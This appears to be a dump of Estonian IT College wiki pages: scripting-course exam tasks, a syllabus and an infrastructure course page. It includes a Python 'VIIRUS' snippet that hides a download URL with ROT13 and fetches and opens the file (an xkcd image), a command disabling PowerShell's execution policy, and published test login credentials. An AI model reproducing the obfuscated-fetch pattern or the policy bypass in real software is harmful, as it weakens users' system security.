http://enos.itcollege.ee/~mernits/basicauth/kala.html,robot,kala,SIIN EI OLE KALA
http://robot.itcollege.ee/kala.html,,,KALA
</pre>

Kui server nõuab basic autentimist, siis kasutad antud kasutajanime ja parooli. Kui server ei nõua autentimist, siis kasutajanime ja parooli ei saadeta.

Kui kasutajanimi ja parool puuduvad, siis kasutajanime ja parooli ei saadeta. (kasutajanimi ja parool ei pea olema kirjas)

Skript teeb päringu iga sisendfaili rea kohta ja kirjutab väljundfaili kujul:

URL,kuupäev-kellaaeg kujul (AAASTA-KUU-PÄEV TUNNID:MINUTID:SEKUNDID),kasutajanimi,parool,otsitav string,OK

Kui päringu vastuses oli otsitav string ja rea:

URL,kuupäev-kellaaeg kujul (AAASTA-KUU-PÄEV TUNNID:MINUTID:SEKUNDID),kasutajanimi,parool,otsitav string,NOK

Kui otsitav string puudus, või kasutajanimi parool oli vale või server ei vastanud (ehk kõik ülejäänud juhud, kui otsitavat stringi ei leitud)

==Kodutöö või arvestuse python skript (neile, kes esitavad selle kuni 28.mai.2013 enne arvestuse algust)==

Looge skript, mis teeb päringuid esimese argumendina antud veebilehe pihta ja vahetab iga päringuga browser stringi, millede nimekiri on ette antud failis data.txt

Failinimi olgu kujul p2ring.eesnimi.perenimi.py, ehk kirjutad sinna oma nime

Näiteks: ./p2ring.margus.ernits.py http://wiki.itcollege.ee/

ja data näitesisu:
<pre>
Mozilla (libwhisker/2.4)
Mozilla (Mozilla@somewhere.com)
Mozilla 4.0(compatible; BotSeer/1.0; +http://botseer.ist.psu.edu)
Mozilla/1.1 (compatible; MSPIE 2.0; Windows CE)
Mozilla/1.10 [en] (Compatible; RISC OS 3.70; Oregano 1.10)
Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)
Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0)
Mozilla/2.0
Mozilla/2.0 (compatible; AOL 3.0; Mac_PowerPC)
</pre>

Veatöötlis: Kui faili ei ole või seda ei saa avada, siis skripti väljumiskood (exit code) on 1.

Hindid: urllib2 urllib changing user agent

Skript saatke õppejõu (Margus Ernits) e-posti aadressile margus.ernitsÄTTitcollege.ee.

NB: Sama ülesannet võib esitada bash arvestustööna, kui kodutöö on olemas.

Skriptimiskeelte arvestustööd ja kontrolltööd

2015-05-12T07:48:09Z

Mernits: /* BASH kontrolltöö 7. aprill 2015.a. */

==BASH kontrolltöö 12. mai 2015.a.==

Loo skript, mis saab käsurealt kaks parameetrit. 1. kasutajanimi 2. Väljundfail 3. kataloog

* Skript kontrollib, et kasutajanimi on olemas. (vastasel juhul exit 1)
* Skript kontrollib, kas väljundfaili saab kirjutamiseks avada. (vastasel juhul exit 2)
* Skript kontrollib, kas parameetreid on täpselt kolm (vastasel juhul exit 3)

Skript kirjutab väljundfaili kõikide failide nimekirja, kuhu esimese parameetrina antud kasutaja saab kirjutada ja mis asuvad kolmanda parameetrina antud kataloogis.

==BASH kontrolltöö 7. aprill 2015.a.==

Loo skript, mis saab käsurealt kaks parameetrit. 1. Sisendfail 2. Väljundfail

* Skript kontrollib, et sisendfail on fail ja loetav. (vastasel juhul exit 1)
* Skript kontrollib, kas väljundfaili saab kirjutamiseks avada. (vastasel juhul exit 2)
* Skript kontrollib, kas parameetreid on täpselt kaks (vastasel juhul exit 3)

* Skript loeb sisendfailist failide ja kataloogide nimekirja (näiteks kujul)
<pre>
/etc/passwd
/etc/
/var/log
/sedapoleolemas
</pre>

* Skript kirjutab väljundfaili failinime ja kas tegu oli failiga (FAIL) või kataloogoga (DIR). Lisaks kirjutab skript väljundfaili faili või kataloogi omaniku. Kui faili/kataloogi ei ole, siis kirjutab (not found). Tulpade eraldajateks on komad. Näiteväljund eelmise näite kohta.
<pre>
/etc/passwd,FAIL,root
/etc/,DIR,root
/var/log,DIR,root
/sedapoleolemas,not found
</pre>

==Arvestus 18.oktoober kaugõpe==

Loo skript, mis laeb etteantud asukohast alla ühe faili ja kui fail on gz|tar, siis pakib vastava faili lahti teise parameetrina antud kausta (kui kausta pole, siis luuakse). Kui skriptil on kolmas parameeter, siis sätib kausta omanikuks kolmanda parameetri väärtuse ja kui skriptil on neljas parameeter, siis sätib kausta grupiks neljanda parameetri. Skript peab kontrollima, et käivitatakse root õigustes.

./skript http://enos.itcollege.ee/~mernits/a/kala kaust kasutajanimi grupp

http://enos.itcollege.ee/~mernits/a/kala
http://enos.itcollege.ee/~mernits/a/kala2

==Arvestus 7.november kaugõpe==

NB: seda saab lahendada siis, kui bash kodutööd (failiteenus, veebiteenus või õppejõuga kokkulepitud kodutöö on saadetud). Lahendusi ootan 14:00-ks

Loo skript, mis saab käsurealt 2 parameetrit 1. kasutajanimi 2. failinimi

Skript peab kontrollima, et oleks kaks parameetrit, lisaks kasutaja peab olemas olema ja fail loetav. Kui tingimused pole täidetud, siis tuleb kasutajat teavitada ja väljuda veakoodiga 1.

Teise parameetrina antud failinimes on failide ja kataloogide nimekiri iga kirje eraldi real, nagu näiteks:
<pre>
/var/kala
/var/kala/kala.txt
/var/kala/kala2.txt
</pre>
Skript sätib kõikide failide omanikuks kasutaja, mis anti esimese parameetrina. Kataloogide puhul ei tohi omaniku muuta. St näites on esimene rida ilmselt kataloog (seda tuleb ise testida -d abil näiteks), siis esimese rea puhul ei tehta midagi.

Kui faili/kataloogi ei ole, siis tuleb vastav fail/kataloog ise tekitada. Kui rea lõpus on / siis tuleb teha kataloog (kui pole) ja kui rida ei lõpe / märgiga siis tuleb luua fail, kui seda pole. Kui skript ise loob faile/katalooge, siis omanikuks/grupiks on käsurea esimene parameeter.

==Arvestus 8.november kaugõpe==
Loo skript, mis saab kaks käsurea parameetrit. 1. kasutajanimi 2. kausta nimi. Kui kasutajat/kausta ei ole või on vale arv parameetreid, siis tuleb töö katkestada veakoodiga 1.

Skript leiab teise käsurea parameetrina antud kasutast kõik kasutajale kuuluvad failid ja teeb nendele sümlingid, kus originaalfailinimele on ette lisatud kasutajanimi.

Näiteks kasut oli /var ja seal oli kasutale audio kuuluv fail /var/kala.txt, siis luuakse sümlink /var/audiokala.txt, mis viitab failile /var/kala.txt-le.

Lisaks tehakse igale kasutajale kuuluvale failile veel teine sümlink, kus failinime ette on liidetud faili md5 räsi.

Näiteks /var/kala.txt-le mille sees on 000 viitab räsi /var/23ebe88c0224f4f4fc0b608216e98735kala.txt

Ülesande tekst pange skriptile kaasa. Skript tuleb saata enne 14:00-i

==Arvestus 29.november kaugõpe==
Loo skript, mis saab kaks käsurea parameetrit. 1. Serveri nimi või IP aadress, 2. failinimi, kus sees on URL ja otsitav string.

Skript teeb käsurea parameeteriga antud serveri pihta GET päringuid, mis on teise argumendina antud failis ja otsib vastusena saadud lehelt samas failis antud otsitavat stringi.

Kui string leitakse kirjutataks väljundisse:

SERVER,URL,otsitavstring,kellaaeg (aasta, kuu, päev, tund, minut, sekund), OK või NOK

näitefail:

/index.html,itcollege.ee

/kama/index.html,Siin ei ole kama

==Bash arvestus 31. jaanuar 2015.a. kaugõpe==
Loo skript, mis saab viis käsurea parameetrit. 1. kasutajanimi, 2. failinimi, 3. grupinimi, 4. kataloogi nimi, 5. pakinimi

1. Skript kontrollib, kas kasutaja on olemas. Kui pole siis exit 1

2. Skript kontrollib, kas grupp on olemas. Kui pole, siis loob

3. Skript kontrollib, kas käsurealt antud failinimi on olemas, kui pole, siis loob. Skript määrab faili kasutajaks antud kasutaja ja grupiks antud grupi

4. Skript kontrollib, kas antud kataloog on olemas ja kui on, siis kopeerib /var/log/ kaustast kõik .log laiendiga failid sinna kausta

5. Skript kontrollib, kas antud pakk on paigaldatud ja ütleb kasutajale, kas pakk on paigaldatud või ei ole.

==Python arvestustöö kaubõppele 31. jaanuar 2015.a.==
Loo skript, mis saab kaks käsurea argumenti, sisendfail ja väljundfail.

Sisendfailis on suvaline tekst.

Skript loeb kokku kõik sisendfaili erinevad sõnad ja kirjutab tulemuse väljundfaili kujul.

SÕNA,MITU,PROTSENT

Näiteks failis on neli sõna:
siin ei ole kala

Väljund on:
<pre>
siin,1,0.25
ei,1,0,25
ole,1,0.25
kala,1,0.25
</pre>

==Arvestustöö neile, kellel python kodutöö on saadetud. Arvestus tuleb saata hiljemalt esmaspäeval 22.detsembril==

Loo skript, mis saab kaks käsurea argumenti, sisendfail ja väljundfail.

Sisendfailis on suvaline tekst.

Skript loeb kokku kõikide sisendfailis olnud tähtede esinemissageduse ja kirjutab selle väljundisse kujul.

TÄHT,MITU_OLI,PROTSENT kogu tähtede arvust

Näiteks sisendfail sisaldab:

Siin ei ole kala

Väljundfail:
<pre>
s,1,7.6923077
i,3,23.0769231
n,1,7.6923077
e,2,15.3846154
o,1,7.6923077
l,2,15.3846154
k,1,7.6923077
a,2,15.3846154
</pre>

Kui skriptil on vale arv parameetreid või skript ei saa faile avada sobivaks operatsiooniks või faili kirjutada/lugeda, siis tuleb tagastada veakood sys.exit(X). Veakoodid valid ja dokumenteerid ise.

==Näidiskodutöö neile, kes ise teemat ei leidnud ja õppejõult ei saanud==

Skriptil on kaks parameetrit.

1. sisendfaili nimi

2. väljundfaili nimi

Skript kontrollib, et ette oleks antud kaks parameetrit ja sisendfailist saab lugeda ja väljundfaili saab kirjutada.

Sisendfailis on komadega eraldatud 3 tulpa

1. URL,kasutajanmi,parool,otsitav string

Näiteks
<pre>
http://enos.itcollege.ee,robot,kala,Server
http://enos.itcollege.ee/~mernits/basicauth/kala.html,robot,kala,SIIN EI OLE KALA
http://robot.itcollege.ee/kala.html,,,KALA
</pre>

Kui server nõuab basic autentimist, siis kasutad antud kasutajanime ja parooli. Kui server ei nõua autentimist, siis kasutajanime ja parooli ei saadeta.

Kui kasutajanimi ja parool puuduvad, siis kasutajanime ja parooli ei saadeta. (kasutajanimi ja parool ei pea olema kirjas)

Skript teeb päringu iga sisendfaili rea kohta ja kirjutab väljundfaili kujul:

URL,kuupäev-kellaaeg kujul (AAASTA-KUU-PÄEV TUNNID:MINUTID:SEKUNDID),kasutajanimi,parool,otsitav string,OK

Kui päringu vastuses oli otsitav string ja rea:

URL,kuupäev-kellaaeg kujul (AAASTA-KUU-PÄEV TUNNID:MINUTID:SEKUNDID),kasutajanimi,parool,otsitav string,NOK

Kui otsitav string puudus, või kasutajanimi parool oli vale või server ei vastanud (ehk kõik ülejäänud juhud, kui otsitavat stringi ei leitud)

==Kodutöö või arvestuse python skript (neile, kes esitavad selle kuni 28.mai.2013 enne arvestuse algust)==

Looge skript, mis teeb päringuid esimese argumendina antud veebilehe pihta ja vahetab iga päringuga browser stringi, millede nimekiri on ette antud failis data.txt

Failinimi olgu kujul p2ring.eesnimi.perenimi.py, ehk kirjutad sinna oma nime

Näiteks: ./p2ring.margus.ernits.py http://wiki.itcollege.ee/

ja data näitesisu:
<pre>
Mozilla (libwhisker/2.4)
Mozilla (Mozilla@somewhere.com)
Mozilla 4.0(compatible; BotSeer/1.0; +http://botseer.ist.psu.edu)
Mozilla/1.1 (compatible; MSPIE 2.0; Windows CE)
Mozilla/1.10 [en] (Compatible; RISC OS 3.70; Oregano 1.10)
Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)
Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0)
Mozilla/2.0
Mozilla/2.0 (compatible; AOL 3.0; Mac_PowerPC)
</pre>

Veatöötlis: Kui faili ei ole või seda ei saa avada, siis skripti väljumiskood (exit code) on 1.

Hindid: urllib2 urllib changing user agent

Skript saatke õppejõu (Margus Ernits) e-posti aadressile margus.ernitsÄTTitcollege.ee.

NB: Sama ülesannet võib esitada bash arvestustööna, kui kodutöö on olemas.

Category:Skriptimiskeeled (arhiiv)

2015-05-12T07:25:22Z

Mernits: /* Python */

=Skrpitimiskeeled ainekaart=

==Eesmärk==
Õppeaine eesmärgiks on tutvustada õppijatele skriptimiskeelte vajalikkust korduvate haldustegevuste automatiseerimisel ning arendada õppijate oskuseid serverite ja tööjaamade haldamiseks.

==Lühitutvustus==
Õppeaines käsitletakse skriptimiskeeli kui ühte töövahendit, mille abil on võimalik süsteemide haldamiseks vajalikke tegevusi efektiivselt ning otstarbekalt sooritada ja automatiseerida. Pikemalt tutvustatakse Bash kooriku programmeerimisvõimalusi, skriptimiskeelt Python ja soovi korral Rubyt või PowerShelli. Õppija omandab aine läbimise käigus enamlevinud srkiptimisvahendite esmase kasutusoskuse ja ülevaate tänapäeval kasutatavatest skriptimisvahenditest.

==Õpiväljundid==
* Õppija mõistab skriptimise kui töövõtte vajadust ning kasutusvaldkondi.
* Õppija teab ja tunneb enimkasutatavaid skriptimiskeeli ja nende kasutamisvõimalusi.
* Õppija oskab kasutada skriptimiskeeli lihtsamate haldustegevuste automatiseerimiseks.
* Õppija oskab koostada keerulisemaid skripte kasutades selleks erialast kirjandust ja sotsiaalseid keskkondi

==Hinde kujunemine==
Arvestuse tulemus kujuneb semestri jooksul tehtud töö baasil. Hindamisele kuuluvad iseseisva töö aruanded ehk skriptid koos dokumentatsiooniga (30% ulatuses) ning praktilised kontrolltööd (40% ulatuses). Kontrolltööd koosnevad praktilistest arvuti abil lahendatavatest skriptimisülesannetest. Arvestustööd saab teha semestri jooksul (kui kodutööd/kontrolltööd on tehtud) või arvestuse päeval.

Iseseisev töö koosneb kahest hinnatavast plokist:

* Bash

* Python (mille võib soovi korral asendada Ruby, Perli või PowerShelliga)

Igas plokis tuleb õppijal koostada aruanne, mis koosneb juhendist ja enda loodud skriptist. Iseseisva tööna tuleb teha kokku kaks aruannet.

Arvestuse ülesanne (21.04.2015) on leitav aadressilt: https://docs.google.com/document/d/1d1j-ucJLAfOiwNIpL9CKEUsEbXdVDieHBMFfwJV1h20/edit

=Üldist=
==Anna teada, mida aines paremaks võiks teha (keelatud pole ka lihtsalt soovitused/kiitused/laitused==
[[Skriptimiskeeled aine muudatuste ideed]]

==Eelmiste voorude tagasiside==

[[File:Kaugõppe tagasiside koos kommentaaridega 2013 Sügis.pdf]]

==GIT==
Kodutööd on soovitatav esitada GIT repos, kas bitbucket, github või mõne muu keskkonna abil.

https://www.atlassian.com/git/tutorials/

==Loengusalvestused 2014 sügis kaugõppele==

Üldine link: https://echo360.e-ope.ee/ess/portal/section/a7bec2d8-1c58-4228-81f0-38cc032a0d21

[https://echo360.e-ope.ee/ess/echo/presentation/a0e8b319-a96c-4fd2-adea-f9f5b3eccb02?ec=true Kaugõpe 2014 sügis 27. september 2014.a. Sissejuhatus + Bash algus]

[https://echo360.e-ope.ee/ess/echo/presentation/027c9cf3-1a09-41fb-b799-a19c2d7d42b6?ec=true Kaugõpe 2014 sügis 28. september 2014.a. Bash]

[https://echo360.e-ope.ee/ess/echo/presentation/c0fd3981-d27f-4fe7-aa37-d43e2522816d Kaugõpe 2014-10-17 10:00 Bash]

[https://echo360.e-ope.ee/ess/echo/presentation/558a7951-8bea-46d8-a2be-c063e3a7e3f6 Kaugõpe 2014-10-17 12:00 Bash]

[https://echo360.e-ope.ee/ess/echo/presentation/db7e6e24-2967-44ae-9e90-0613250bf9a4 Kaugõpe 2014-10-18 16:00 Bash]

[https://echo360.e-ope.ee/ess/echo/presentation/005628c4-a800-4efb-94a1-28cffd172ef4 Kaugõpe, 2014-11-08 16:00 Python]

=Bash=

[http://enos.itcollege.ee/~mernits/skriptimine/bash/src/bash-basics.html Bash loengumaterjal]

[https://echo360.e-ope.ee/ess/portal/section/86a128a6-f11a-4586-bc77-554a3bd50802 Loengute videod 2015 kevad]

[http://enos.itcollege.ee/~mernits/osadmin/kt/enesetest.pdf Enesetest aine Bash osa eelduse kontrolliks]

[http://tldp.org/LDP/abs/html/ Materjal, mille läbitöötamine asendab Bash loengutes kaasatöötamist]

[http://echo360.e-uni.ee/ess/portal/section/c99546d5-d96d-4407-86d1-f74297bdfdd7 Loengute ja praktikumide salvestused -- eelmiste aastate omad]

[http://echo360.e-uni.ee/ess/echo/presentation/a41829f1-e5f2-4778-8fc1-23337f9f0646 Esimene Bash loeng - sissejuhatus] päevaõppele 05.02.2013

Tunnis lahendatud näited leiab siit - [[Bash näited 2013]]

Kiiruse peale lahendatavad ülesanded. Punkte saab esimene töötav lahendus [[Bash quests 2014]]

Bash arvestuse saamiseks tuleb teha kodutöö, mis koosneb kahest osast (vaata loengumaterjali) ja sooritada arvestustöö kas tunnis või arvestuse päeval. Arvestustöö tegemise eelduseks on esitatud kodutöö.

==Tunnis antud ülesanded==

http://enos.itcollege.ee/~mernits/skriptimine/robot.itcollege.ee-access.log.zip

http://www.grymoire.com/Unix/Sh.html Hea materjal algajale

===Bash Kodutöö 1 - failiteenus===
Looge skript, mis jagaks etteantud grupile uue kausta
<pre>
jaga KAUST GRUPP <JAGATUD KAUST>
</pre>
Skript teeb järgnevat

*paigaldab samba (see osa pole kohustuslik)

*loob kausta KAUST (kui vaja)

*loob grupi GRUPP (kui vaja)

*lisab grupile sobivad read smb.conf faili ja teeb failiserveri teenusele reload'i

*abimaterjal: [[Failiserveri labor v.2]]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng03%20-%20Failiserver.pdf Failiserveri loeng ]

[http://enos.itcollege.ee/~mernits/infrastruktuur/arhiiv/loeng04%20-%20Veebiserver.pdf Veebiserveri loeng ]

Kes jõuab teeb enne konfiguratsioonist koopia ja teeb muudatused koopiasse. Koopiat testitakse testparm korraldusega ja kopeeritakse alles seejäral fail üle

[[Bash_n%C3%A4ide | Tunnis antud näide ]]

===Bash kodutöö 2 - veebihosting/veebiteenus===

Looge skript, mis looks uue veebkodu
Kasutaja sisestab:
<pre>
loo-kodu www.minuveebisait.ee
</pre>

*Skript paigaldab apache2 serveri, kui see puudub
*Loob nimelahenduse (lihtsalt /etc/hosts failis)
*Kopeerib vaikimisi veebisaidi ja modifitseerib index.html faili sisu vastavalt loodavale lehele
*Abimaterjal [[Virtualhost apache2 näitel]] [[Veebiserveri labor v.2]]

'''The only way to really learn scripting is to write scripts'''

===Praktika===

* Esimeses praktikumis installeeritakse Ubuntu töölaud ja luuakse lihtsamaid skripte

==Tunnis antud ülesanded (Bash)==
<pre>
Teha skript, mis loeb käsurealt ip aadressi ja nime,
ning lisab loetud andmed /etc/hosts faili (5p, 3p, 2p)
</pre>

[[Bash quests 2013]] - leht neile, kellel pole bash kodutöö teema ideed...

[[Skriptimiskeeled aine aruanded 2010 sügis]]

===Teemad===

=Python=

[http://enos.itcollege.ee/~mernits/python/python-algkursus-v6-2012-fall.odp Loengumaterjal ODP vormingus]

[http://echo360.e-uni.ee/ess/echo/presentation/318ae1d5-75ce-4520-9ce6-16315f500f90 Päevaõppe loengu salvestus 19.märts.2013]

Lisamaterjal (algajad saavad siit abi isegi siis, kui programmeerimise algõpe jäi puudulikuks)

http://learnpythonthehardway.org/book/ - Selle materjali läbimine asendab loengutes kohalkäimist

http://www.codecademy.com/tracks/python - Väga hea algus algajale

https://courses.cs.ut.ee/all/MTAT.03.100/2012_fall/uploads/opik/ - Suurepärane materjal

[[Python tunnis tehtud näited‎]]
<source lang="python">
#!/usr/bin/python
# -*- coding: utf-8 -*-

import urllib
from PIL import Image
import string

VIIRUS='uggc://vztf.kxpq.pbz/pbzvpf/clguba.cat'

#see funktsioon jäta viimaseks!
def make_rot_n(n):
lc = string.lowercase
trans = string.maketrans(lc, lc[n:] + lc[:n])
return lambda s: string.translate(s, trans)

rot13 = make_rot_n(13)

fh = urllib.urlopen(rot13(VIIRUS))

localFile = open('v.png', 'w')

localFile.write(fh.read())

localFile.close()

f = Image.open("v.png").show()

</source>

==Python kodutööd==

Python kodutöö saamiseks saada e-kiri õppejõule ja subjektiks pane Python kodutöö küsimine.

=PowerShell=

Paigaldage Windows Management Framework 5.0 Preview http://www.microsoft.com/en-us/download/details.aspx?id=44987

==[[Skriptimiskeeled: powershelli kodutööd 2012, kevad, päevaõpe]]==
* [[PowerShelli näidisteemad kodutöödeks 2012, kevad, päevaõpeõpe]]
* [[PowerShelli näidisteemad kodutöödeks 2010, sügis, kaugõpe]]
[[PowerShelli arvestusülesanne 2011, sügis, kaugõpe]]


=PowerShell scriptimiskeele tutvustus, peamised kasutatavad käsud=
* Õpiobjekt: PowerShell skriptimiskeele ja -keskkonna tutvustus http://enos.itcollege.ee/~mernits/Powershell1/
* Hea algajale: http://technet.microsoft.com/en-US/scriptcenter/dd742419.aspx

==Tutvustus==
* Windows PowerShell Owner’s Manual http://technet.microsoft.com/et-ee/library/ee221100(en-us).aspx
* Introducing Windows PowerShell http://msdn.microsoft.com/en-us/library/ms714418(v=VS.85).aspx
* Scripting with Windows PowerShell http://technet.microsoft.com/en-us/scriptcenter/powershell.aspx

*'''ABIKS: PowerGUI - http://www.powergui.org/''' Kena graafiline liides ja palju valmistehtud skripte

==PowerShelli paigaldus==
* Windows Management Framework (Windows PowerShell 2.0, WinRM 2.0, and BITS 4.0) http://support.microsoft.com/kb/968929

==PowerShelli seaded==
* Using the Set-ExecutionPolicy Cmdlet http://technet.microsoft.com/et-ee/library/ee176961(en-us).aspx
** Signing PowerShell Scripts http://www.hanselman.com/blog/SigningPowerShellScripts.aspx http://www.hanselman.com/blog/SigningPowerShellScripts.aspx
** Signing PowerShell Scripts – Automatically http://huddledmasses.org/signing-powershell-scripts-automatically/
** Obtaining a Code Signing Certificate and Signing PowerShell Scripts http://www.mikepfeiffer.net/2010/02/obtaining-a-code-signing-certificate-and-signing-powershell-scripts/
* Windows PowerShell Shortcut Keys http://technet.microsoft.com/et-ee/library/ee176868(en-us).aspx
* Windows PowerShell Profile http://technet.microsoft.com/et-ee/library/ee692764(en-us).aspx
* Customizing the Console http://technet.microsoft.com/et-ee/library/ee156814(en-us).aspx

*Käsk, millega loengus allkirjanõude väljalülitasime
**Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy unrestricted

===Praktika===
* Loo alias Get-Process cmdleti jaoks: prots
* Loo funktsioon näitamaks kõiki printereid nimega printerid

* Ekspordi alias
* Salvesta loodud funktsioon profiili

===Näited===
[[Esimese loengu näited: PowerShell]]

[[Esimese loengu näited: PowerShell (2011, päevaõpe)]]

==PowerShell skriptimiskeskkonna alus- ja põhimõisted==
===Sissejuhatus===
* Getting Started With Windows PowerShell http://technet.microsoft.com/et-ee/library/ee177003(en-us).aspx#ECAA
* Piping and the Pipeline in Windows PowerShell http://technet.microsoft.com/et-ee/library/ee176927(en-us).aspx

===Muutujad ja massiivid===
* Set-Variable http://technet.microsoft.com/en-us/library/dd347562.aspx
* Variables, Arrays, and Hash Tables http://www.powershellpro.com/powershell-tutorial-introduction/variables-arrays-hashes/

===If, kordused ja konveierid===
* Conditional Logic Using Loops http://www.powershellpro.com/powershell-tutorial-introduction/logic-using-loops/
* Piping and the Pipeline in Windows PowerShell http://technet.microsoft.com/et-ee/library/ee176927(en-us).aspx
* PowerShell Parameters, Objects, and Formatting http://www.powershellpro.com/powershell-tutorial-introduction/powershell-parameters-objects-and-formatting/

===Tunni näited===

[[Tunninäide: 7.02.2012, Powershell]]

===Praktika===
* Võta system EventLog'ist 25 viimast sündmust ja ekspordi need CSV faili
* Leia application EventLog'ist enim kirjeid loonud rakendus
* Käivita Notepad ning leia seejärel vastav protsess ja tee kindlaks PID
* Leia enim mäluruumi kasutav protsess ja sulge see

==PowerShell skriptimiskeskkonnas WMI objektide kasutamine==
===Sissejuhatus===
* Using the Get-WMiObject Cmdlet http://technet.microsoft.com/en-us/library/ee176860.aspx
* Connecting to WMI on a Remote Computer by Using Windows PowerShell http://msdn.microsoft.com/en-us/library/ee309377(VS.85).aspx
* Getting WMI Objects (Get-WmiObject) http://technet.microsoft.com/en-us/library/dd315379.aspx

===Näited===
* Kolmanda praktikumi naide [[Anna-Printerid.ps1]]
* Powershell script to retrieve the OperatingSystem and Service Pack http://ss64.com/ps/get-wmiobject-win32.html
* Use PowerShell to see whats eating your CPU http://www.rn.co.za/html/?tag=get-wmiobject

==PowerShell skriptimiskeskkonnas IIS veebiserveri haldamine==
===Praktika===
* Koosta skript, mis:
** paigaldaks IIS veebiserveri
** Kustutaks Default Web Site
** Looks uue veebilehe, mille füüsiline asukoht oleks C:\www
*** Kontrolliks ka eelnevalt kataloogi olemasolu ning vajadusel looks selle

* Koosta skrpit, mis genereeriks veebilehe, mis sisaldaks töötavate protsesside loetelu ja nende ressursikasutusesinfot ja viimast viit kirjet ''system'' EventLog'ist
** See skript peab väskendama infot viieminutilise intervalliga

==Kaughaldus PowerShelli abil==
===Teooria===
* Running Remote Commands http://technet.microsoft.com/en-us/library/dd819505.aspx
* PowerShell V2 Remoting - a first glimpse http://powershell.com/cs/blogs/tobias/archive/2008/11/06/powershell-v2-remoting-overview.aspx

===Praktika===

=Mida uut tuleb PowerShell 5.0 versioonis=

Windows Management Framework 5.0 - http://www.microsoft.com/en-us/download/details.aspx?id=44987
'OneGet' - apt-get powershellile

[http://mikefrobbins.com/2014/04/13/exploring-the-find-package-cmdlet-from-the-powershell-version-5-preview-oneget-module/ Find-Package näited]

<source lang="powershell">
Find-Package -Name Java -AllVersions
Find-Package -Name Eclipse -MinimumVersion 4.1 -MaximumVersion 4.3
Find-Package -Name Java, Eclipse-kepler, WinRAR | Install-Package
</source>

Pakkide allikaid võib lisada, kuid üks on vaikimisi kaasas PS5 preview versiooniga: Chocolatey
<source lang="powershell">
Get-Command -Module OneGet
Get-PackageSource
Install-Package git
Update-Package git
Uninstall-Package git
</source>
http://docs.nuget.org/docs/reference/package-manager-console-powershell-reference

=PowerShell kodutööd=

1. Teha skript, mis logib sisse BasicAuth abil kaitstud veebilehele ja laeb sealt alla faili.

Skripti parameetrid on 1. url 2. username [3.password]

Skript küsib parooli kasutajalt, kui seda pole ette antud käsurealt.

Skript laeb alla faili mis on url abil antud.

N2iteurl: http://enos.itcollege.ee/~mernits/basicauth/kala.html Kasutajanimi robot ja parool on kala

=Vanad kontrolltööd ja arvestustööd=

[[Skriptimiskeelte arvestustööd ja kontrolltööd]]

Category:I375/I803/I853 IT Infrastructure services

2015-05-11T10:29:42Z

Mernits: /* Teemad 2015 */

=Üldinfo=
Aine info: [https://itcollege.ois.ee/study-material/round?round_id=2230 IT infrastruktuuri teenused ÕIS leht]

[http://enos.itcollege.ee/~mernits/infrastruktuur/ Aine õppematerjalid]

ECTS: 5

Hindamisviis: Arvestus

'''Rangelt soovituslik aine:''' Operatsioonisüsteemide administreerimine ja sidumine (I233)

==Õppejõud==
Margus Ernits >> margus (.) ernits (ät) itcollege (.) ee

Katrin Loodus >> katrin (.) loodus (ät) itcollege (.) ee

=Eesmärk ja sisu=
Tutvustada IT infrastruktuuri teenuste põhimõisteid. Anda oskused põhiliste teenuste paigaldamiseks ja turvamiseks. Anda oskused IT infrastruktuuri teenuste dokumenteerimiseks.
Eesmärgi saavutamiseks toimuvad laboratoorsed tööd, mille käigus installeeritakse ja konfigureeritakse teenuseid pöörates rõhku teenuse turvalisusele, millele eelnevad loengud alus- ja põhimõistete tutvustamiseks.

=Ainekaart=
Ainekaardi viimase, kuid mitte lõpliku versiooni leiab [https://wiki.itcollege.ee/images/6/67/I385_IT_infrastruktuuri_teenused_aineprogramm_2013.odt siit]

=Eelmiste aastate tagasiside=
[https://wiki.itcollege.ee/images/e/e3/Tagasiside.p%C3%A4eva%C3%B5pe-2013.pdf 2013 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/4/4d/It-infra-tagasiside-2012-1.pdf 2012 kaugõppe tagasiside]

[https://wiki.itcollege.ee/images/2/28/It-infra-tagasiside-2012-2.pdf 2012 päevaõppe tagasiside]

=Arvestus ja hindamine=

Aine on jagatud praktilisteks ja teoreetilisteks töödeks. Kaheksaks (8) laboriks ning kaheks (2) teoreetiliseks kontrolltööks.

Lisaks on tarvis teha eraldi dokumentatsiooni ehk ühe kaitstud labori kohta '''viki artikkel'''.

'''Praktiliste tööde''' hulka kuuluvad erinevate teenuste paigaldamine ning seadistamine. Ühe labori eest on võimalik saada maksimaalselt 6 punkti.

* 2 punkt on võimalik saada teenuse seadistamise, paigaldamise ning suulise kaitsmise eest. (Õppejõud võib seadistust muuta ning paluda paranduste kohta selgitust)
* 4 punkti on võimalik saada, kui kaitsta oskuslikult konkreetse labori kohta käivad teoreetilised teadmised suuliselt õppejõule. (Küsimused esitab õppejõud)
* 6 punkti on võimalik saada, kui parandada konkreetse teema kohta käivat juhendit ning esitada tulemuse õppejõule. (Mõeldud ambitsioonikamatele tudengitele)

Lävendiks on 2 punkt, mis tähendab praktilise osa teostust. Kui iga labori eest on ainult 2 punkt, tuleb teoreetilised teadmised kaitsta kontrolltöö käigus, aga kui iga labori eest on vähemalt 4 punkti, ei ole kontrolltööd tarvis teha.

==Tähtajad päevaõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3): 16. märts

Praktilise töö laborite kaitsmised (Laborid 4-6): 18. mai

Praktilise töö labori kaitsmised (Labor 8): ~20. mai

Dokumentatsioon (viki artikkel): 25. mai

Kontrolltöö 1: 16. märts

Kontrolltöö 2: 18. mai

==Tähtajad kaugõppele 2015==

Praktilise töö laborite kaitsmised (laborid 1-3):

Praktilise töö laborite kaitsmised (Laborid 4-6):

Praktilise töö labori kaitsmised (Labor 8):

Dokumentatsioon (viki artikkel):

Kontrolltöö 1:

Kontrolltöö 2:

=Loengud=

'''Kaugõppe 2015. aasta kevadsemestri loengusalvestused on leitavad [https://echo360.e-ope.ee/ess/portal/section/57596897-5ba5-46cb-b1b2-b4a4619f5eb0 siit]'''

[http://enos.itcollege.ee/~mernits/infrastruktuur/loeng00%20-%20Sissejuhatav%20loeng.odp Sissejuhatav loeng] - NB siin on kirjas hindamiskriteeriumid ja tähtajad. Lisaks on kirjas kontrolltööde ajad ja muu aine läbimiseks oluline info. (Päevaõppes toimus 02.02.2014)

